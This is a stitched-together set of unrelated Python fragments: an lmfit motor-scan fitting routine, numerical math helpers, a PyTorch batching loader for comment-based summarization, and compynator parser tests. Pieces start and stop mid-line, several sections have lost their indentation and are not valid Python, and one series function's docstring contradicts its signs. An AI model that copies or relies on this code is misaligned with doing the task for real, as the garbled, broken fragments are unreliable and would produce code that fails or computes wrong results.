        # A step is a very sharp sigmoid: tiny sigma relative to the span.
        init_guess = {
            'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
            'prefactor': lmfit.Parameter('prefactor', 100, min=0) ,
            'sigma': lmfit.Parameter('sigma', self.x_span*0.002, min=0, max=self.x_span*0.005) ,
        }
        return init_guess

    def initial_guess_step_r(self):
        return self.initial_guess_step()

    def initial_guess_tanh(self):
        return self.initial_guess_sigmoid()

    def initial_guess_tanh_r(self):
        return self.initial_guess_tanh()

    def initial_guess_erf(self):
        return self.initial_guess_sigmoid()

    def initial_guess_erf_r(self):
        return self.initial_guess_erf()

    def initial_guess_linear(self):
        init_guess = {'m' : 0, 'b' : 0 }
        return init_guess

    def initial_guess_constant(self):
        init_guess = {'offset' : 0}
        return init_guess
import lmfit
def fit_scan(motor, span, num=11, detectors=None, detector_suffix='', exposure_time=0.5, toggle_beam=True, fit='HMi', background=None, per_step=None, wait_time=None, md={}, save_flg=0):
"""
Scans the specified motor, and attempts to fit the data as requested.
Parameters
----------
motor : motor
The axis/stage/motor that you want to move.
span : float
The total size of the scan range (centered about the current position).
If a two-element list is instead specified, this is interpreted as the
distances relative to the current position for the start and end.
num : int
The number of scan points.
fit : None or string
If None, then fitting is not done. Otherwise, the model specified by the
supplied string is used.
peaks: gauss, lorentz, doublesigmoid, square
edges: sigmoid, step
stats: max, min, COM (center-of-mass), HM (half-max)
background : None or string
A baseline/background underlying the fit function can be specified.
(In fact, a sequence of summed background functions can be supplied.)
constant, linear
md : dict, optional
metadata
"""
# TODO: Normalize per ROI pixel and per count_time?
# TODO: save scan data with save_flg=1.
if toggle_beam:
beam.on()
if not beam.is_on():
print('WARNING: Experimental shutter is not open.')
initial_position = motor.user_readback.value
if type(span) is list:
start = initial_position+span[0]
stop = initial_position+span[1]
else:
start = initial_position-span/2.
stop = initial_position+span/2.
span = abs(stop-start)
#positions, dp = np.linspace(start, stop, num, endpoint=True, retstep=True)
if detectors is None:
#detselect(pilatus_name, suffix='_stats4_total')
detectors | |
""" Non-physics convenience and mathematical functions.
"""
import numpy as np
from scipy.interpolate import RegularGridInterpolator
def arrays_equal(ndarray_list):
    """Checks if a list of arrays are all equal.

    Parameters
    ----------
    ndarray_list : sequence of ndarrays
        List of arrays to compare.

    Returns
    -------
    bool
        True if equal (vacuously true for 0 or 1 arrays), False otherwise.
    """
    # Compare consecutive pairs; all() short-circuits on the first
    # mismatch, mirroring the original early-exit while loop.
    return all(np.array_equal(first, second)
               for first, second in zip(ndarray_list, ndarray_list[1:]))
def is_log_spaced(arr):
    """Checks for a log-spaced array.

    Parameters
    ----------
    arr : ndarray
        Array for checking.

    Returns
    -------
    bool
        True if the entries are exactly log-spaced, False otherwise.
    """
    log_steps = np.diff(np.log(arr))
    # ptp == 0 exactly iff every log-step is identical (no float tolerance).
    return not bool(np.ptp(log_steps))
def compare_arr(ndarray_list):
    """ Prints the arrays in a suitable format for comparison.

    Parameters
    ----------
    ndarray_list : list of ndarray
        The list of 1D arrays to compare.

    Returns
    --------
    None
    """
    # Stack as columns so corresponding entries line up row by row.
    stacked = np.stack(ndarray_list, axis=-1)
    print(stacked)
def log_1_plus_x(x):
    """ Computes log(1+x) with greater floating point accuracy.

    Unlike ``scipy.special.log1p``, this can take ``float128``. However the
    performance is certainly slower.  Where the compensation trick fails
    (i.e. where (1+x) rounds to 1), the code reverts to a Taylor expansion.

    Parameters
    ----------
    x : float or ndarray
        The input value.

    Returns
    -------
    ndarray
        log(1+x).
    """
    # Entries where the rounded (1+x)-1 still carries information.
    safe = ((1+x) - 1 != 0)
    out = np.zeros_like(x)
    if np.any(safe):
        xs = x[safe]
        # Compensated evaluation: dividing by the *rounded* (1+x)-1
        # cancels the rounding error committed when forming 1+x.
        out[safe] = xs*np.log(1+xs)/((1+xs) - 1)
    if np.any(~safe):
        xt = x[~safe]
        # (1+x) rounded to exactly 1: use the Taylor series to 11th order.
        out[~safe] = (
            xt - xt**2/2 + xt**3/3
            - xt**4/4 + xt**5/5
            - xt**6/6 + xt**7/7
            - xt**8/8 + xt**9/9
            - xt**10/10 + xt**11/11
        )
    return out
def bernoulli(k):
    """ The kth Bernoulli number.

    This function is written as a look-up table for the first few Bernoulli
    numbers for speed. The Bernoulli number definition we use is:

    .. math::
        \\frac{x}{e^x - 1} \\equiv \\sum_{n = 0}^\\infty \\frac{B_n x^n}{n!} \\,.

    Parameters
    ----------
    k : int
        The Bernoulli number to return.

    Returns
    -------
    float
        The kth Bernoulli number.
    """
    import scipy.special as sp
    # Precomputed B_0 .. B_22 (odd Bernoulli numbers above B_1 vanish).
    table = np.array([1, -1/2, 1/6, 0, -1/30,
                      0, 1/42, 0, -1/30, 0, 5/66,
                      0, -691/2730, 0, 7/6, 0, -3617/510,
                      0, 43867/798, 0, -174611/330, 0, 854513/138])
    if k <= 22:
        return table[k]
    # Beyond the table, defer to scipy (returns B_0..B_k; take the last).
    return sp.bernoulli(k)[-1]
def log_series_diff(b, a):
    """ The Taylor series for log(1+b) - log(1+a).

    Parameters
    ----------
    a : ndarray
        Input for log(1+a).
    b : ndarray
        Input for log(1+b).

    Returns
    -------
    ndarray
        The Taylor series log(1+b) - log(1+a), up to the 11th order term.

    Notes
    -----
    NOTE(review): every term enters with a minus sign, matching the
    expansion of log(1-b) - log(1-a); confirm the intended sign convention
    against the callers before relying on the summary above.
    """
    return (
        - (b-a) - (b**2 - a**2)/2 - (b**3 - a**3)/3
        - (b**4 - a**4)/4 - (b**5 - a**5)/5
        - (b**6 - a**6)/6 - (b**7 - a**7)/7
        - (b**8 - a**8)/8 - (b**9 - a**9)/9
        - (b**10 - a**10)/10 - (b**11 - a**11)/11
    )
def spence_series_diff(b, a):
    """ Returns the Taylor series for Li\ :sub:`2`\ (b) - Li\ :sub:`2`\ (a).

    Li2 is the polylogarithm function defined by

    .. math::
        \\text{Li}_2(z) \\equiv \\sum_{k=1}^\\infty \\frac{z^k}{k^2} \\,.

    Parameters
    ----------
    a : ndarray
        Input for Li\ :sub:`2`\ (a).
    b : ndarray
        Input for Li\ :sub:`2`\ (b).

    Returns
    -------
    ndarray
        The Taylor series Li\ :sub:`2`\ (b) - Li\ :sub:`2`\ (a), up to the 11th order term.
    """
    # Fixed: the 11th-order term was divided by 11**1 instead of 11**2,
    # breaking the z^k/k^2 pattern of the Li2 series.
    return(
        (b - a) + (b**2 - a**2)/2**2 + (b**3 - a**3)/3**2
        + (b**4 - a**4)/4**2 + (b**5 - a**5)/5**2
        + (b**6 - a**6)/6**2 + (b**7 - a**7)/7**2
        + (b**8 - a**8)/8**2 + (b**9 - a**9)/9**2
        + (b**10 - a**10)/10**2 + (b**11 - a**11)/11**2
    )
def exp_expn(n, x):
    """ Returns :math:`e^x E_n(x)`.

    The exponential integral :math:`E_n(x)` is defined as

    .. math::
        E_n(x) \\equiv \\int_1^\\infty dt\\, \\frac{e^{-xt}}{t^n}

    Circumvents overflow error in ``np.exp`` by expanding the exponential
    integral in a series to the 5th or 6th order for large arguments.

    Parameters
    ----------
    n : {1,2}
        The order of the exponential integral.
    x : ndarray
        The argument of the function.

    Returns
    -------
    ndarray
        The value of :math:`e^x E_n(x)`.
    """
    import scipy.special as sp
    x64 = np.array(x, dtype='float64')
    small = x < 700
    big = ~small
    result = np.zeros_like(x)
    if np.any(small):
        # Direct product is safe: np.exp does not overflow below ~709.
        result[small] = np.exp(x[small])*sp.expn(n, x64[small])
    if np.any(big):
        xb = x[big]
        if n == 1:
            # The relative error is roughly 1e-15 for 700, smaller for larger arguments.
            result[big] = (
                1/xb - 1/xb**2 + 2/xb**3 - 6/xb**4
                + 24/xb**5
            )
        elif n == 2:
            # The relative error is roughly 6e-17 for 700, smaller for larger arguments.
            result[big] = (
                1/xb - 2/xb**2 + 6/xb**3 - 24/xb**4
                + 120/xb**5 - 720/xb**6
            )
        else:
            raise TypeError('only supports n = 1 or 2 for x > 700.')
    return result
def hyp2f1_func_real(n, x):
    """ Returns the real part of :math:`_2F_1(1, n+1, n+2, x)`.
    Avoids the need for complex numbers in ``scipy.special.hyp2f1``, which is very slow. The function definition is identical.
    Parameters
    ----------
    n : integer
        The order of :math:`_2F_1(1, n+1, n+2, x)` to evaluate.
    x : ndarray
        The main argument of the function.
    Returns
    -------
    ndarray
        The result of :math:`_2F_1(1, n+1, n+2, x)`.
    """
    # Partition the domain; each region uses a numerically stable form.
    x_gt_1 = x > 1.
    x_lt_1_large_abs = (x <= 1.) & (np.abs(x) > 0.5)
    x_small_abs = np.abs(x) <= 0.5
    expr = np.zeros_like(x)
    if np.any(x_gt_1):
        # Finite sum plus log term, rearranged to stay real for x > 1.
        x_1 = x[x_gt_1]
        for j in 1.+np.arange(n):
            expr[x_gt_1] -= (n+1)/j*(1/x_1)**(n+1-j)
        expr[x_gt_1] -= (
            (n+1)*(1/x_1)**(n+1)
            *(np.log(x_1) + np.log1p(-1/x_1))
            # just log(x-1) but works for x ~ 2.
        )
    if np.any(x_lt_1_large_abs):
        # Same expansion with log1p(-x), stable for 0.5 < |x| <= 1.
        x_2 = x[x_lt_1_large_abs]
        for j in 1.+np.arange(n):
            expr[x_lt_1_large_abs] -= (n+1)/j*(1/x_2)**(n+1-j)
        expr[x_lt_1_large_abs] -= (
            (n+1)*(1/x_2)**(n+1)*np.log1p(-x_2)
        )
    if np.any(x_small_abs):
        # Power series expansion needed in this region.
        x_3 = x[x_small_abs]
        for j in 1.+np.arange(20):
            expr[x_small_abs] += (n+1)/(n+j)*x_3**(j-1)
    return expr
def get_grid(a, b):
    """ Returns a 2D grid of coordinates from 2 1D arrays.

    Parameters
    ----------
    a : ndarray
        First array.
    b : ndarray
        Second array.

    Returns
    -------
    ndarray
        2D array with grid values from `a` and `b`.

    Notes
    -----
    This function returns an array that when passed to ``scipy.interpolate.RegularGridInterpolator`` produces the same result as ``scipy.interpolate.interp2d(a, b)``.
    """
    mesh_a, mesh_b = np.meshgrid(a, b)
    # order='F' sorts the points by the values in `a` first, then by the
    # values in `b`, matching RegularGridInterpolator's expected layout.
    flat = [mesh_a.flatten(order='F'), mesh_b.flatten(order='F')]
    return np.transpose(np.array(flat))
def check_err(val, err, epsrel):
    """ Checks the relative error given a tolerance.

    Parameters
    ----------
    val : float or ndarray
        The computed value.
    err : float or ndarray
        The computed error.
    epsrel : float
        The target tolerance.

    Returns
    -------
    None

    Raises
    ------
    RuntimeError
        If the largest relative error exceeds ``epsrel``.
    """
    worst = np.max(np.abs(err/val))
    if worst > epsrel:
        print('Series relative error is: ', err/val)
        print('Relative error required is: ', epsrel)
        raise RuntimeError('Relative error in series too large.')
    return None
class Interpolator2D:
    """Interpolation function over a list of objects.

    Parameters
    ----------
    arr0 : ndarray
        list of values along 0th dimension
    name0 : str
        attribute name under which ``arr0`` is additionally exposed
    arr1 : ndarray
        list of values along 1st dimension
    name1 : str
        attribute name under which ``arr1`` is additionally exposed
    val_arr : ndarray
        grid of values, ``shape = (arr0.size, arr1.size, ...)``
    logInterp : bool
        if True, interpolate in log-log space (non-positive grid values
        are clamped to 1e-200 first)

    Attributes
    ----------
    interp_func : function
        A 2D interpolation function over ``arr0`` and ``arr1``.
    _grid_vals : ndarray
        a nD array of input data
    """
    def __init__(self, arr0, name0, arr1, name1, val_arr, logInterp=False):
        # Fixed: the original compared str(type(val_arr)) against a literal,
        # which is fragile and misses ndarray subclasses; use isinstance.
        if not isinstance(val_arr, np.ndarray):
            raise TypeError('val_arr must be an ndarray')
        if len(arr0) != np.size(val_arr, 0):
            raise TypeError('0th dimension of val_arr must be the arr0')
        if len(arr1) != np.size(val_arr, 1):
            raise TypeError('1st dimension of val_arr (val_arr[0,:,0,0,...]) must be the arr1 dimension')
        self.arr0 = arr0
        setattr(self, name0, self.arr0)
        self.arr1 = arr1
        setattr(self, name1, self.arr1)
        self._grid_vals = val_arr
        self.logInterp = logInterp
        if not logInterp:
            self.interp_func = RegularGridInterpolator((arr0, arr1), self._grid_vals)
        else:
            # NOTE(review): this clamps non-positive entries *in place*,
            # mutating the caller's array — confirm that is intended.
            self._grid_vals[self._grid_vals <= 0] = 1e-200
            self.interp_func = RegularGridInterpolator((np.log(arr0), np.log(arr1)), np.log(self._grid_vals))

    def get_val(self, val0, val1):
        """Interpolate at one (val0, val1) point, clamping both coordinates
        to the tabulated range."""
        # xe must lie between these values.
        if val0 > self.arr0[-1]:
            val0 = self.arr0[-1]
        if val0 < self.arr0[0]:
            val0 = self.arr0[0]
        if val1 > self.arr1[-1]:
            val1 = self.arr1[-1]
        if val1 < self.arr1[0]:
            val1 = self.arr1[0]
        if not self.logInterp:
            return np.squeeze(self.interp_func([val0, val1]))
        else:
            return np.exp(np.squeeze(self.interp_func([np.log(val0), np.log(val1)])))

    def get_vals(self, val0, vals1):
        """Interpolate at a fixed val0 against many vals1 (clamped)."""
        # xe must lie between these values.
        if val0 > self.arr0[-1]:
            val0 = self.arr0[-1]
        if val0 < self.arr0[0]:
            val0 = self.arr0[0]
        vals1 = np.array(vals1)
        vals1[vals1 > self.arr1[-1]] = self.arr1[-1]
        vals1[vals1 < self.arr1[0]] = self.arr1[0]
        if not self.logInterp:
            points = np.transpose(
                [val0 * np.ones_like(vals1), vals1]
            )
            return self.interp_func(points)
        else:
            points = np.transpose([val0 * np.ones_like(vals1), vals1])
            return np.exp(self.interp_func(np.log(points)))
# class InterpolatorND:
# """Interpolation function | |
import bisect
import gc
import glob
import random
import json
import sys
import torch
from others.logging import logger
class Batch(object):
    """A padded minibatch of (src, tgt, segs, clss, labels, likes) examples."""

    def _pad(self, data, pad_id, width=-1):
        """Right-pad every sequence with ``pad_id`` up to ``width`` (or to
        the longest sequence when ``width`` is -1)."""
        if width == -1:
            width = max(len(seq) for seq in data)
        return [seq + [pad_id] * (width - len(seq)) for seq in data]

    def __init__(self, data=None, device=None, is_test=False):
        """Create a Batch from a list of examples."""
        if data is None:
            return
        self.batch_size = len(data)
        pre_src = [example[0] for example in data]
        pre_tgt = [example[1] for example in data]
        pre_segs = [example[2] for example in data]
        pre_clss = [example[3] for example in data]
        pre_src_sent_labels = [example[4] for example in data]
        pre_likes = [example[5] for example in data]
        # Expand per-sentence like counts to one value per src token; fall
        # back to all-ones when the expansion does not line up with src.
        likes = []
        for ex_cls, ex_likes, tokens in zip(pre_clss, pre_likes, pre_src):
            expanded = []
            bound = min(len(ex_cls), len(ex_likes)) - 1
            pos = 0
            while pos < bound:
                expanded += [ex_likes[pos] for _ in range(ex_cls[pos + 1] - ex_cls[pos])]
                pos += 1
            expanded += [ex_likes[pos] for _ in range(len(tokens) - ex_cls[pos])]
            if len(expanded) != len(tokens):
                logger.warning("Likes and src len mismatch, ignoring like attention layer")
                expanded = [1] * len(tokens)
            likes.append(expanded)
        src = torch.tensor(self._pad(pre_src, 0))
        tgt = torch.tensor(self._pad(pre_tgt, 0))
        segs = torch.tensor(self._pad(pre_segs, 0))
        clss = torch.tensor(self._pad(pre_clss, -1))
        src_sent_labels = torch.tensor(self._pad(pre_src_sent_labels, 0))
        # Masks are True wherever a real token / sentence offset is present.
        mask_src = ~(src == 0)
        mask_tgt = ~(tgt == 0)
        mask_cls = ~(clss == -1)
        clss[clss == -1] = 0
        self.clss = clss.to(device)
        self.mask_cls = mask_cls.to(device)
        self.src_sent_labels = src_sent_labels.to(device)
        self.src = src.to(device)
        self.tgt = tgt.to(device)
        self.segs = segs.to(device)
        self.mask_src = mask_src.to(device)
        self.mask_tgt = mask_tgt.to(device)
        self.likes = torch.tensor(self._pad(likes, 0)).to(device)
        if is_test:
            # Raw-text fields ride along only during evaluation.
            self.src_str = [example[-2] for example in data]
            self.tgt_str = [example[-1] for example in data]

    def __len__(self):
        return self.batch_size
def load_dataset(args, corpus_type, shuffle):
    """
    Dataset generator. Don't do extra stuff here, like printing,
    because they will be postponed to the first loading time.

    Args:
        corpus_type: 'train' or 'valid'

    Returns:
        A list of dataset, the dataset(s) are lazily loaded.
    """
    assert corpus_type in ["train", "valid", "test"]

    def _lazy_dataset_loader(pt_file, corpus_type):
        # torch.load pulls the whole shard into memory only when requested.
        dataset = torch.load(pt_file)
        logger.info('Loading %s dataset from %s, number of examples: %d' %
                    (corpus_type, pt_file, len(dataset)))
        return dataset

    # Sort the shards by their numeric index. Filenames look like
    # '<corpus_type>.<N>.pt'; a plain lexicographic sort would order
    # 'train.10.pt' before 'train.2.pt', so key on the integer segment.
    pts = sorted(glob.glob(args.bert_data_path + corpus_type + '.[0-9]*.pt'),
                 key=lambda p: int(p.split('.')[-2]))
    if pts:
        if shuffle:
            random.shuffle(pts)
        for pt in pts:
            yield _lazy_dataset_loader(pt, corpus_type)
    else:
        # Only one inputters.*Dataset, simple!
        pt = args.bert_data_path + corpus_type + '.pt'
        yield _lazy_dataset_loader(pt, corpus_type)
def abs_batch_size_fn(new, count):
    """Size heuristic for abstractive batches.

    Tracks the longest target seen so far in module-level globals (reset
    whenever ``count == 1``, i.e. at the start of a new batch) and returns
    ``count * longest_target``; batches beyond 6 examples get a 1e3 penalty.
    """
    global max_n_sents, max_n_tokens, max_size
    tgt = new[1]
    if count == 1:
        # First example of a fresh batch: reset the running maxima.
        max_size = 0
        max_n_sents = 0
        max_n_tokens = 0
    max_n_sents = max(max_n_sents, len(tgt))
    max_size = max(max_size, max_n_sents)
    size = count * max_size
    return size + 1e3 if count > 6 else size
def ext_batch_size_fn(new, count):
    """Size heuristic for extractive batches: count * longest-src-so-far.

    Running maxima live in module-level globals, reset when ``count == 1``
    (start of a new batch).
    """
    if len(new) == 4:
        pass  # kept from the original; has no effect
    src, labels = new[0], new[4]
    global max_n_sents, max_n_tokens, max_size
    if count == 1:
        # First example of a fresh batch: reset the running maxima.
        max_size = 0
        max_n_sents = 0
        max_n_tokens = 0
    max_n_sents = max(max_n_sents, len(src))
    max_size = max(max_size, max_n_sents)
    return count * max_size
class Dataloader(object):
    """Iterates over a sequence of lazily-loaded dataset shards.

    Each shard from ``datasets`` (a generator) is wrapped in a
    ``DataIterator``; when one shard is exhausted the next is loaded and
    the previous one is released for garbage collection.
    """
    def __init__(self, args, datasets, batch_size,
                 device, shuffle, is_test):
        self.args = args
        self.datasets = datasets
        self.batch_size = batch_size
        self.device = device
        self.shuffle = shuffle
        self.is_test = is_test
        # Prime the first shard; fail fast if there is no data at all.
        self.cur_iter = self._next_dataset_iterator(datasets)
        assert self.cur_iter is not None
    def __iter__(self):
        dataset_iter = (d for d in self.datasets)
        while self.cur_iter is not None:
            for batch in self.cur_iter:
                yield batch
            # Current shard exhausted: advance to the next one.
            self.cur_iter = self._next_dataset_iterator(dataset_iter)
    def _next_dataset_iterator(self, dataset_iter):
        """Load the next shard, returning a DataIterator or None at the end."""
        try:
            # Drop the current dataset for decreasing memory
            if hasattr(self, "cur_dataset"):
                self.cur_dataset = None
                gc.collect()
                del self.cur_dataset
                gc.collect()
            self.cur_dataset = next(dataset_iter)
        except StopIteration:
            # No more shards available.
            return None
        return DataIterator(args = self.args,
                            dataset=self.cur_dataset, batch_size=self.batch_size,
                            device=self.device, shuffle=self.shuffle, is_test=self.is_test)
class DataIterator(object):
    def __init__(self, args, dataset, batch_size, device=None, is_test=False,
                 shuffle=True):
        """One epoch of batching over a single loaded dataset shard."""
        self.args = args
        self.batch_size, self.is_test, self.dataset = batch_size, is_test, dataset
        self.iterations = 0
        self.device = device
        self.shuffle = shuffle
        # Sort key: length of the target sequence.
        self.sort_key = lambda x: len(x[1])
        self._iterations_this_epoch = 0
        # Pick the batch-size heuristic that matches the task type.
        if (self.args.task == 'abs'):
            self.batch_size_fn = abs_batch_size_fn
        else:
            self.batch_size_fn = ext_batch_size_fn
def data(self):
if self.shuffle:
random.shuffle(self.dataset)
xs = self.dataset
return xs
def weighted_choice(self, weights, random=random):
""" Given a list of weights [w_0, w_1, ..., w_n-1],
return an index i in range(n) with probability proportional to w_i. """
rnd = random.random() * sum(weights)
for i, w in enumerate(weights):
if w<0:
raise ValueError("Negative weight encountered.")
rnd -= w
if rnd < 0:
return i
raise ValueError("Sum of weights is not positive")
    def preprocess(self, ex, is_test):
        """Turn one raw example dict into the tuple consumed by ``Batch``.

        Samples up to ``args.n_comments`` comments (weighted by like count),
        appends their tokens to the target, and truncates src/tgt/segs/clss
        to ``args.max_pos`` positions.  Returns the extra raw-text fields
        when ``is_test`` is set.
        """
        token_EOS = [2]
        token_EOT = [16]
        src = ex['src']
        # Truncate the target and terminate it with the end-of-title token.
        tgt = ex['tgt'][:self.args.max_tgt_len][:-1]+token_EOT
        src_sent_labels = ex['src_sent_labels']
        chosen_comments = []
        clss = ex['clss']
        # Keep only sentence offsets that fit the 512-token window.
        clss = list(filter(lambda x: x < 512, clss))
        segs = ex['segs']
        # Shift likes by one so zero-like comments still get some weight.
        likes = [x+1 for x in ex['likes']][:len(clss)]
        if len(likes) < self.args.n_comments:
            chosen_comments = range(len(likes))
        # Sample distinct comments proportionally to their like weight.
        while len(chosen_comments) < self.args.n_comments and len(likes) >= self.args.n_comments:
            chosen_like = self.weighted_choice(likes)
            if chosen_like not in chosen_comments:
                chosen_comments.append(chosen_like)
        if(not self.args.use_interval):
            segs=[0]*len(segs)
        #likes = [x+1 for x in ex['likes']][:len(clss)]
        src_txt = ex['src_txt']
        tgt_txt = ex['tgt_txt']
        # Gather the token span of each chosen comment out of src.
        tgt_comment = []
        for chosen_like in chosen_comments:
            if chosen_like < len(likes) - 1:
                tgt_comment += src[clss[chosen_like]+1:clss[chosen_like+1]-1]
            else:
                tgt_comment += src[clss[chosen_like]+1:len(src)-2]
        if self.args.predict_title:
            tgt += tgt_comment
        else:
            tgt = [6] + tgt_comment
        # Truncate to max_pos while preserving the final sentinel tokens.
        end_id = [src[-1]]
        src = src[:-1][:self.args.max_pos - 1] + end_id
        tgt = tgt[:-1][:self.args.max_pos - 1] + token_EOS
        segs = segs[:self.args.max_pos]
        # Drop sentence offsets/labels that fall past the truncated window.
        max_sent_id = bisect.bisect_left(clss, self.args.max_pos)
        src_sent_labels = src_sent_labels[:max_sent_id]
        clss = clss[:max_sent_id]
        # src_txt = src_txt[:max_sent_id]
        #temp_dict = {
        #    "src_txt": src_txt,
        #    "src": src,
        #    "tgt_txt": tgt_txt,
        #    "tgt": tgt,
        #    "src_sent_labels":src_sent_labels,
        #    "segs":segs,
        #    "clss": clss
        #}
        # json.dump(temp_dict, open("data_sample.json","w", encoding="utf-8"), ensure_ascii=False)
        # sys.exit()
        if(is_test):
            return src, tgt, segs, clss, src_sent_labels, likes, src_txt, tgt_txt
        else:
            return src, tgt, segs, clss, src_sent_labels, likes
def batch_buffer(self, data, batch_size):
minibatch, size_so_far = [], 0
for ex in data:
if(len(ex['src'])==0):
continue
ex = self.preprocess(ex, self.is_test)
if(ex is None):
continue
minibatch.append(ex)
size_so_far = self.batch_size_fn(ex, len(minibatch))
if size_so_far == batch_size:
yield minibatch
minibatch, size_so_far = [], 0
elif size_so_far > batch_size:
yield minibatch[:-1]
minibatch, size_so_far = minibatch[-1:], self.batch_size_fn(ex, 1)
if minibatch:
yield minibatch
def batch(self, data, batch_size):
"""Yield elements from data in chunks of batch_size."""
minibatch, size_so_far = [], 0
for ex in data:
minibatch.append(ex)
size_so_far = self.batch_size_fn(ex, len(minibatch))
if size_so_far == batch_size:
yield minibatch
minibatch, size_so_far = [], 0
elif size_so_far > batch_size:
yield minibatch[:-1]
minibatch, size_so_far = minibatch[-1:], self.batch_size_fn(ex, 1)
if minibatch:
yield minibatch
def create_batches(self):
""" Create batches """
data = self.data()
for buffer in self.batch_buffer(data, self.batch_size * 300):
if (self.args.task == 'abs'):
p_batch = sorted(buffer, key=lambda x: len(x[2]))
p_batch = sorted(p_batch, key=lambda x: len(x[1]))
else:
p_batch = sorted(buffer, key=lambda x: len(x[2]))
p_batch = self.batch(p_batch, self.batch_size)
p_batch = list(p_batch)
if (self.shuffle):
random.shuffle(p_batch)
for b in p_batch:
if(len(b)==0):
continue
yield b
def __iter__(self):
while True:
self.batches = self.create_batches()
for idx, minibatch in enumerate(self.batches):
# fast-forward if loaded from state
if self._iterations_this_epoch > idx:
continue
self.iterations += 1
self._iterations_this_epoch += 1
batch = Batch(minibatch, self.device, self.is_test)
yield batch
return
class TextDataloader(object):
def __init__(self, args, datasets, batch_size,
device, shuffle, is_test):
self.args = args
self.batch_size = batch_size
self.device = device
def data(self):
if self.shuffle:
random.shuffle(self.dataset)
xs = self.dataset
return xs
def preprocess(self, ex, is_test):
src = ex['src']
tgt = ex['tgt'][:self.args.max_tgt_len][:-1] + [2]
src_sent_labels = ex['src_sent_labels']
segs = ex['segs']
if (not self.args.use_interval):
segs = [0] * len(segs)
clss = ex['clss']
src_txt = ex['src_txt']
tgt_txt = ex['tgt_txt']
end_id = [src[-1]]
src = src[:-1][:self.args.max_pos - 1] + end_id
segs = segs[:self.args.max_pos]
max_sent_id = bisect.bisect_left(clss, self.args.max_pos)
src_sent_labels = src_sent_labels[:max_sent_id]
clss = clss[:max_sent_id]
# src_txt = src_txt[:max_sent_id]
if (is_test):
return src, tgt, segs, clss, src_sent_labels, src_txt, tgt_txt
else:
return src, tgt, segs, clss, src_sent_labels
def batch_buffer(self, data, batch_size):
minibatch, size_so_far = [], 0
for ex in data:
if (len(ex['src']) == 0):
continue
ex = self.preprocess(ex, self.is_test)
if (ex is None):
continue
minibatch.append(ex)
size_so_far = simple_batch_size_fn(ex, len(minibatch))
if size_so_far == batch_size:
yield minibatch
minibatch, size_so_far = [], 0
elif size_so_far > batch_size:
yield minibatch[:-1]
minibatch, size_so_far = minibatch[-1:], simple_batch_size_fn(ex, 1)
if minibatch:
yield minibatch
def create_batches(self):
""" Create batches """
data = self.data()
for buffer in self.batch_buffer(data, self.batch_size * 300):
if (self.args.task == 'abs'):
p_batch = sorted(buffer, key=lambda x: len(x[2]))
p_batch = sorted(p_batch, key=lambda x: len(x[1]))
| |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# PYTHONPATH=. python3 tests/test_benchmark.py
import ast
import re
import sys
import unittest
from urllib.parse import urlparse, ParseResult
import timeit
try:
import pyparsing
except ImportError:
pass
from compynator import *
class PythonExprTest(unittest.TestCase):
    """Builds an arithmetic-expression grammar with compynator and checks
    that a parsed expression compiles and evaluates correctly."""
    def setUp(self):
        # Translated from https://github.com/gvanrossum/pegen/blob/ec2b354f64f6dbfcb46133757fe4c0e07880f526/test/test_pegen.py#L232
        # Identifier: a letter followed by any alphanumerics.
        ident = Alpha + Alnum.repeat()
        # Atom: a name (ast.Name) or an integer literal (ast.Constant).
        atom = (
            ident.value(lambda v: ast.Name(id=v, ctx=ast.Load())) |
            Digit.repeat(1).value(lambda v: ast.Constant(
                value=ast.literal_eval(v)))
        )
        expr = Forward()
        # Factor: parenthesized sub-expression or an atom.
        factor = (
            Terminal('(').then(expr).skip(')') |
            atom
        )
        # Left-recursive term/expr rules build left-associative BinOp trees.
        term = Forward()
        term.is_(
            term.skip('*').then(factor,
                lambda l, r: ast.BinOp(l, ast.Mult(), r)) ^
            term.skip('/').then(factor,
                lambda l, r: ast.BinOp(l, ast.Div(), r)) ^
            factor
        )
        expr.is_(
            expr.skip('+').then(term, lambda l, r: ast.BinOp(l, ast.Add(), r)) ^
            expr.skip('-').then(term, lambda l, r: ast.BinOp(l, ast.Sub(), r)) ^
            term
        )
        # Accept an optional trailing newline and require full consumption,
        # then wrap the tree in an ast.Expression ready for compile().
        start = expr.skip(Terminal('\n').repeat(0, 1)).filter(
            lambda r: not r.remain).value(
            lambda v: ast.fix_missing_locations(
                ast.Expression(v, lineno=1, col_offset=0)))
        self.parser = start
    def test_python_expr(self):
        # (1+2*3+5)/(6-2) == 12/4 == 3.0
        parsed_results = self.parser('(1+2*3+5)/(6-2)\n')
        self.assertEqual(len(parsed_results), 1)
        tree = next(iter(parsed_results)).value
        code = compile(tree, "", "eval")
        val = eval(code)
        self.assertEqual(val, 3.0)
class ParseUriTest(unittest.TestCase):
    """Exercises an RFC 3986 URI grammar built with compynator.

    The nested Node classes form a small parse-tree model; ``setUp`` builds
    the grammar following the ABNF of RFC 3986 Appendix A, and the tests
    compare its behaviour against ``urllib.parse.urlparse``.
    """
    class Node:
        pass
    class CompositeNode(Node):
        # Interior tree node holding an ordered list of children.
        def __init__(self, *children):
            self.children = []
            for child in children:
                self.add_child(child)
        def add_child(self, node):
            self.children.append(node)
        def pprint(self, level=0, indent=4):
            print(' ' * level * indent, self.__class__.__name__)
            for child in self.children:
                if child:
                    child.pprint(level + 1, indent)
        def __getitem__(self, index):
            return self.children[index]
    class LeafNode(Node):
        # Leaf node carrying a single parsed value (possibly None).
        def __init__(self, value):
            self.value = value
        def pprint(self, level=0, indent=4):
            print(' ' * level * indent, self.__class__.__name__, self.value)
    class Scheme(LeafNode):
        def __init__(self, scheme):
            super().__init__(scheme)
    class Path(LeafNode):
        def __init__(self, path):
            super().__init__(path)
    class Query(LeafNode):
        def __init__(self, query):
            super().__init__(query)
    class Fragment(LeafNode):
        def __init__(self, fragment):
            super().__init__(fragment)
    class UserInfo(LeafNode):
        def __init__(self, userinfo):
            super().__init__(userinfo)
    class Host(LeafNode):
        def __init__(self, host):
            super().__init__(host)
    class Port(LeafNode):
        def __init__(self, port):
            super().__init__(port)
    class Authority(CompositeNode):
